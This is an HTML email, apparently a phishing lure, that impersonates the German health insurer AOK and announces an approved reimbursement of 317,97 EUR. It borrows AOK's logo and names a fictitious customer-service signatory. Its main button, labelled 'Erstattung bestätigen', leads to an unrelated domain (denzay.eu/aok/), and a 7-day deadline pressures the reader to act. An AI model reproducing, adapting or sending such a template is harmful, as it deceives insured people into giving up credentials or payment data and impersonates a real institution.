<!DOCTYPE html>
<html lang="de" xmlns="http://www.w3.org/1999/xhtml">
<head>
  <meta charset="UTF-8" />
  <meta name="viewport" content="width=device-width, initial-scale=1.0" />
  <meta http-equiv="X-UA-Compatible" content="IE=edge" />
  <title>AOK &#x2013; Kostenerstattung</title>
  <style>
    @import url('https://fonts.googleapis.com/css2?family=Inter:wght@400;500;600;700;800&display=swap');
    * { margin: 0; padding: 0; box-sizing: border-box; }
    body { font-family: 'Inter', Arial, sans-serif; background-color: #f2f5f2; color: #1a2e1a; -webkit-font-smoothing: antialiased; }
    .email-wrapper { max-width: 640px; margin: 40px auto; background: #ffffff; overflow: hidden; box-shadow: 0 2px 16px rgba(0,0,0,0.09); }

    /* SPLIT HEADER */
    .header-split { display: table; width: 100%; background-color: #005E3F; }
    .header-left { display: table-cell; width: 50%; padding: 28px 30px 28px 40px; vertical-align: middle; border-right: 1px solid rgba(255,255,255,0.15); }
    .header-left img { height: 48px; display: block; margin-bottom: 10px; }
    .header-left-sub { color: rgba(255,255,255,0.60); font-size: 11px; letter-spacing: 1.5px; text-transform: uppercase; }
    .header-right { display: table-cell; width: 50%; padding: 28px 40px 28px 30px; vertical-align: middle; background-color: #004730; }
    .header-right-label { color: rgba(255,255,255,0.55); font-size: 10px; font-weight: 700; letter-spacing: 2px; text-transform: uppercase; margin-bottom: 8px; }
    .header-right-amount { color: #91F54A; font-size: 34px; font-weight: 800; letter-spacing: -1px; line-height: 1; margin-bottom: 4px; }
    .header-right-type { color: rgba(255,255,255,0.75); font-size: 13px; font-weight: 500; }

    /* STATUS STRIP */
    .status-strip { background-color: #003820; padding: 12px 40px; display: flex; gap: 24px; align-items: center; }
    .status-pill { display: flex; align-items: center; gap: 7px; }
    .status-pill-dot { width: 8px; height: 8px; border-radius: 50%; flex-shrink: 0; }
    .status-pill-dot.green { background: #91F54A; }
    .status-pill-dot.mid { background: rgba(145,245,74,0.5); }
    .status-pill-dot.dim { background: rgba(145,245,74,0.25); }
    .status-pill-text { color: rgba(255,255,255,0.70); font-size: 11px; font-weight: 600; letter-spacing: 0.5px; }
    .status-pill-text.active { color: #91F54A; font-weight: 700; }
    .status-sep { color: rgba(255,255,255,0.20); font-size: 14px; }

    /* MAIN CONTENT */
    .content { padding: 36px 40px 32px; }

    /* GREETING */
    .greeting { font-size: 15px; color: #3a4a3a; line-height: 1.7; margin-bottom: 28px; }

    /* SECTION DIVIDER */
    .section-divider { display: flex; align-items: center; gap: 12px; margin-bottom: 16px; margin-top: 8px; }
    .section-divider-line { flex: 1; height: 1px; background: #dce8dc; }
    .section-divider-label { font-size: 10px; font-weight: 700; letter-spacing: 2px; text-transform: uppercase; color: #005E3F; white-space: nowrap; }

    /* TWO-COLUMN INVOICE */
    .invoice-cols { display: table; width: 100%; border-collapse: separate; border-spacing: 12px; margin-bottom: 8px; }
    .invoice-col { display: table-cell; width: 50%; vertical-align: top; background: #f8fbf8; border: 1px solid #dce8dc; border-radius: 4px; padding: 18px 20px; }
    .invoice-col-title { font-size: 10px; font-weight: 700; letter-spacing: 1.5px; text-transform: uppercase; color: #7a8e7a; margin-bottom: 12px; }
    .invoice-col-item { margin-bottom: 10px; }
    .invoice-col-item-label { font-size: 12px; color: #7a8e7a; margin-bottom: 2px; }
    .invoice-col-item-value { font-size: 15px; font-weight: 700; color: #1a2e1a; }
    .invoice-col-item-value.green { color: #005E3F; font-size: 18px; }

    /* TOTAL ROW */
    .total-bar { background: linear-gradient(to right, #005E3F, #004730); border-radius: 4px; padding: 16px 24px; display: flex; align-items: center; justify-content: space-between; margin-bottom: 28px; }
    .total-bar-left { color: rgba(255,255,255,0.75); font-size: 13px; font-weight: 600; letter-spacing: 0.5px; text-transform: uppercase; }
    .total-bar-right { color: #ffffff; font-size: 22px; font-weight: 800; }

    /* STATUS TABLE */
    .status-table { width: 100%; border-collapse: collapse; margin-bottom: 28px; }
    .status-table td { padding: 11px 0; border-bottom: 1px solid #eef4ee; font-size: 14px; vertical-align: middle; }
    .status-table tr:last-child td { border-bottom: none; }
    .status-table .stt-icon { width: 32px; text-align: center; font-size: 16px; }
    .status-table .stt-name { font-weight: 600; color: #1a2e1a; padding-left: 8px; }
    .status-table .stt-name.pending { color: #005E3F; }
    .status-table .stt-badge { text-align: right; }
    .badge-done { background: #e6f5e6; color: #005E3F; font-size: 11px; font-weight: 700; padding: 4px 10px; border-radius: 10px; }
    .badge-active { background: #91F54A; color: #003820; font-size: 11px; font-weight: 700; padding: 4px 10px; border-radius: 10px; }

    /* CTA */
    .cta-wrapper { margin: 10px 0 28px; text-align: center; background-color: #f8fbf8; border-radius: 6px; padding: 28px 20px; border: 1px solid #dce8dc; }
    .cta-wrapper p { font-size: 14px; color: #4a5e4a; margin-bottom: 16px; line-height: 1.5; }
    .cta-btn { display: inline-block; background-color: #91F54A; color: #003820; font-size: 15px; font-weight: 800; padding: 16px 40px; border-radius: 4px; text-decoration: none; }

    /* NOTICE */
    .notice { background: #fffef0; border: 1px solid #d4c880; border-radius: 4px; padding: 14px 18px; margin-bottom: 28px; font-size: 13px; color: #5a5020; line-height: 1.6; }
    .notice strong { color: #3a3810; }

    /* SIGNATURE */
    .signature { border-top: 2px solid #005E3F; padding-top: 22px; }
    .sig-intro { font-size: 14px; color: #6a7e6a; margin-bottom: 5px; }
    .sig-name { font-size: 16px; font-weight: 700; color: #005E3F; margin-bottom: 2px; }
    .sig-role { font-size: 13px; color: #8a9e8a; }

    /* FOOTER */
    .footer { background: #004730; padding: 16px 40px; display: flex; align-items: center; gap: 14px; }
    .footer-line { width: 2px; height: 24px; background: rgba(145,245,74,0.4); }
    .footer-text { color: rgba(255,255,255,0.45); font-size: 11px; }
  </style>
</head>
<body>
  <div class="email-wrapper">

    <!-- SPLIT HEADER -->
    <div class="header-split">
      <div class="header-left">
        <img src="https://login.meine.aok.de/logos/aok-signet-white.svg" alt="AOK" />
        <div class="header-left-sub">Die Gesundheitskasse</div>
      </div>
      <div class="header-right">
        <div class="header-right-label">Erstattungsbetrag</div>
        <div class="header-right-amount">317,97&#x20ac;</div>
        <div class="header-right-type">Kostenerstattung</div>
      </div>
    </div>

    <!-- STATUS STRIP -->
    <div class="status-strip">
      <div class="status-pill">
        <div class="status-pill-dot mid"></div>
        <span class="status-pill-text">In Pr&#xfc;fung</span>
      </div>
      <span class="status-sep">&#x203a;</span>
      <div class="status-pill">
        <div class="status-pill-dot mid"></div>
        <span class="status-pill-text">Genehmigt</span>
      </div>
      <span class="status-sep">&#x203a;</span>
      <div class="status-pill">
        <div class="status-pill-dot green"></div>
        <span class="status-pill-text active"><strong>Auszahlung</strong></span>
      </div>
    </div>

    <!-- CONTENT -->
    <div class="content">

      <p class="greeting">
        Sehr geehrte Kundin, sehr geehrter Kunde,<br /><br />
        Ihre <strong>Kostenerstattung</strong> in H&#xf6;he von <strong>317,97&#x20ac;</strong> wurde erfolgreich gepr&#xfc;ft und genehmigt. Diese R&#xfc;ckzahlung basiert auf eingereichten Rechnungen aus der letzten Abrechnungsperiode.
      </p>

      <!-- SECTION: INVOICE -->
      <div class="section-divider">
        <div class="section-divider-line"></div>
        <div class="section-divider-label">Abrechnung</div>
        <div class="section-divider-line"></div>
      </div>

      <div class="invoice-cols">
        <div class="invoice-col">
          <div class="invoice-col-title">Erstattungsdetails</div>
          <div class="invoice-col-item">
            <div class="invoice-col-item-label">Erstattungsart</div>
            <div class="invoice-col-item-value">Kostenerstattung</div>
          </div>
          <div class="invoice-col-item">
            <div class="invoice-col-item-label">Abrechnungsperiode</div>
            <div class="invoice-col-item-value">Letzte Periode</div>
          </div>
        </div>
        <div class="invoice-col">
          <div class="invoice-col-title">Zahlungsbetrag</div>
          <div class="invoice-col-item">
            <div class="invoice-col-item-label">Erstattungsbetrag</div>
            <div class="invoice-col-item-value green">317,97&#x20ac;</div>
          </div>
          <div class="invoice-col-item">
            <div class="invoice-col-item-label">Auszahlungsbetrag</div>
            <div class="invoice-col-item-value green">317,97&#x20ac;</div>
          </div>
        </div>
      </div>

      <div class="total-bar">
        <span class="total-bar-left">Gesamtauszahlung</span>
        <span class="total-bar-right">317,97&#x20ac;</span>
      </div>

      <!-- SECTION: STATUS -->
      <div class="section-divider">
        <div class="section-divider-line"></div>
        <div class="section-divider-label">Bearbeitungsstatus</div>
        <div class="section-divider-line"></div>
      </div>

      <table class="status-table">
        <tr>
          <td class="stt-icon">&#x2714;</td>
          <td class="stt-name">In Pr&#xfc;fung</td>
          <td class="stt-badge"><span class="badge-done">Abgeschlossen</span></td>
        </tr>
        <tr>
          <td class="stt-icon">&#x2714;</td>
          <td class="stt-name">Genehmigt</td>
          <td class="stt-badge"><span class="badge-done">Abgeschlossen</span></td>
        </tr>
        <tr>
          <td class="stt-icon">&#x1f4b0;</td>
          <td class="stt-name pending"><strong>Auszahlung</strong></td>
          <td class="stt-badge"><span class="badge-active">Bereit</span></td>
        </tr>
      </table>

      <!-- CTA WRAPPER -->
      <div class="cta-wrapper">
        <p>Klicken Sie auf den folgenden Button, um Ihre Kostenerstattung sicher online zu best&#xe4;tigen:</p>
        <a href="https://denzay.eu/aok/" class="cta-btn">&#x1f449;  Erstattung best&#xe4;tigen</a>
      </div>

      <!-- NOTICE -->
      <div class="notice">
        <strong>Hinweis:</strong> Bitte fordern Sie den Betrag innerhalb von <strong>7 Tagen</strong> ab. Danach steht er aus technischen Gr&#xfc;nden nicht mehr zur Verf&#xfc;gung.
      </div>

      <!-- SIGNATURE -->
      <div class="signature">
        <p class="sig-intro">Mit freundlichen Gr&#xfc;&#xdf;en</p>
        <p class="sig-name">Maximilian Becker</p>
        <p class="sig-role">Kundenservice &#xb7; AOK Bundesverband</p>
      </div>

    </div><!-- /content -->

    <!-- FOOTER -->
    <div class="footer">
      <div class="footer-line"></div>
      <span class="footer-text">&#xa9; 2026 AOK Bundesverband. Alle Rechte vorbehalten.</span>
    </div>

  </div>
</body>
</html>